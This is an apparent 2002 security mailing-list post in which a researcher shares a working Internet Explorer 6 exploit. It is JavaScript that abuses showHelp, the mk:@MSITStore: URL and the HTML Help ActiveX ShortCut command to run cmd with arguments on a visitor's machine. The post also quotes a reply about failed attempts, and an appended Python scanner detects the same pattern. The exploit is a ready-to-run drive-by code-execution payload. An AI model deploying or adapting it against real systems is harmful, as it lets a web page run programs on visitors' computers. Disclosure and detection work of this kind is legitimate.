Rule #1: Never use timers in IE exploits. :)

When I was developing the exploit I noticed I had to add some delay (using a timer) because the mk:@MSITStore:C: url was not loaded directly by IE. If the timer was set too tight I would sometimes receive the error: "This operation can only function in HTML Help", which is kind of natural if we try to do javascript:document.write(...) before the mk:@MSITStore:C: url is set by IE.

In my advisory I wrote: "If your computer is heavily loaded, then the value of the setTimeout timer has to be increased." Well, there can actually be several reasons why you need to increase the timer. When I tried the exploit from another webserver (longer distance) I noticed I had to increase the timer.

So this is what I will do. I will include an exploit using an alert prompt to simulate delay. If you still can't get it to work on IE 6 SP1 (with latest patches), then contact me by mail so I can check if there are any other reasons why it does not work. (You are welcome to confirm the exploit as well.)

I will only focus on fully patched IE 6 SP1, not IE 5.5. Myself, I run Win2000 pro IE 6.0.2800.1106 SP1 (latest patches). I did verify the exploit on 3 other machines running IE 6 SP1 (XP, Win2000pro) before posting my advisory.

Thank you Hawkan, CM and Tys0n-@IRCnet.

Sincerely,
Andreas Sandblad

I hope the exploit will not give a virus alert.
-----------------------------------------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se

prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
       'echo Sandblad #10 > c:/vulnerable.txt & winmine';

if (!location.hash) {
  showHelp(location+"#1");
  showHelp("iexplore.chm");
  blur();
}
else if (location.hash == "#1")
  open(location+"2").blur();
else {
  f = opener.location.assign;
  opener.location="res:";
  alert("Wait 1");
  f("javascript:location.replace('mk:@MSITStore:C:')");
  alert("Wait 2");
  f("javascript:document.write('<object id=c1 classid=clsid:adb"+
    "880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
    "=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
    "object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
    "-00aa003b7a11><param name=Command value=Close></object>')");
  f("javascript:c1.Click();c2.Click();");
  close();
}
</script>
-----------------------------------------------------------

On 8 Nov 2002 hysterix1@aol.com wrote:

> In-Reply-To: <006001c28704$a3c1ef10$a600a8c0@LocalHost>
>
> Doesn't work on mine, yours or Andreas'. I get a "This operation can only
> function in HTML Help". Also, since I have debugging on, I get a line 0
> permission denied error from IE.
>
> location.replace('mk:@MSITStore:C:')
>
> Only that line of code is in my debugger.
>
> I use Windows 2000 (SP3) and IE (SP1) + recent patches for the Windows Help
> buffer overflow (which also patched other things)

--
       _ _
      o' \,=./ `o
         (o o)
-ooO--(_)--Ooo-
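A defender-side addition, not part of the thread or the author's code: a small Python scanner that flags the building blocks of the technique discussed above (the HTML Help control CLSID, the ShortCut command, the mk:@MSITStore: URL and the showHelp() call) in page or script text, and joins JS string literals first so markup that has been split across concatenations, as in the exploit, is still matched. The indicator names, verdict levels and sample inputs are assumptions constructed for illustration.

```python
# Defender-side scanner for the HTML Help ActiveX (HHCtrl) ShortCut-command
# pattern used in the post. Example code, not from the original thread;
# the indicator names and sample inputs are constructed for illustration.
import re

# CLSID of the HTML Help control, as it appears in the exploit above.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

INDICATORS = {
    "hhctrl_object": re.compile(r"classid\s*=\s*[\"']?\s*clsid:" + HHCTRL_CLSID, re.I),
    "shortcut_command": re.compile(r"name\s*=\s*[\"']?Command[\"']?\s+value\s*=\s*[\"']?ShortCut", re.I),
    "msitstore_url": re.compile(r"mk:@MSITStore:", re.I),
    "showhelp_call": re.compile(r"\bshowHelp\s*\(", re.I),
}
# Item1 carries the ",program,arguments" string handed to the ShortCut command.
ITEM1 = re.compile(r"name\s*=\s*[\"']?Item1[\"']?\s+value\s*=\s*[\"']?([^>\"']*)", re.I)

def unsplice_js_strings(text):
    """Join adjacent JS string literals ('abc'+ 'def') so markup that was
    split across concatenated literals, as in the exploit, matches as one."""
    return re.sub(r"[\"']\s*\+\s*[\"']", "", text)

def scan(text):
    """Return the indicators found, any Item1 command strings, and a verdict."""
    joined = unsplice_js_strings(text)
    hits = [name for name, rx in INDICATORS.items() if rx.search(joined)]
    commands = [m.group(1).strip() for m in ITEM1.finditer(joined)]
    if "hhctrl_object" in hits and "shortcut_command" in hits:
        verdict = "high"        # control instantiated with a ShortCut command
    elif hits:
        verdict = "suspicious"  # one building block present, not the full chain
    else:
        verdict = "clean"
    return {"indicators": hits, "commands": commands, "verdict": verdict}

# Constructed samples: the markup as written into the document, the same
# markup split across JS literals as in the post, and a benign page.
SAMPLE_RENDERED = (
    '<object id=c1 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>'
    '<param name=Command value=ShortCut>'
    '<param name=Item1 value=",cmd,/k echo test"></object>'
)
SAMPLE_SPLIT = (
    "document.write('<object classid=clsid:adb\"+\n"
    "\"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value\"+\n"
    "\"=ShortCut></object>')"
)
BENIGN = "<html><body><p>No ActiveX here.</p></body></html>"

if __name__ == "__main__":
    for label, sample in [("rendered", SAMPLE_RENDERED), ("split", SAMPLE_SPLIT), ("benign", BENIGN)]:
        print(label, scan(sample))
```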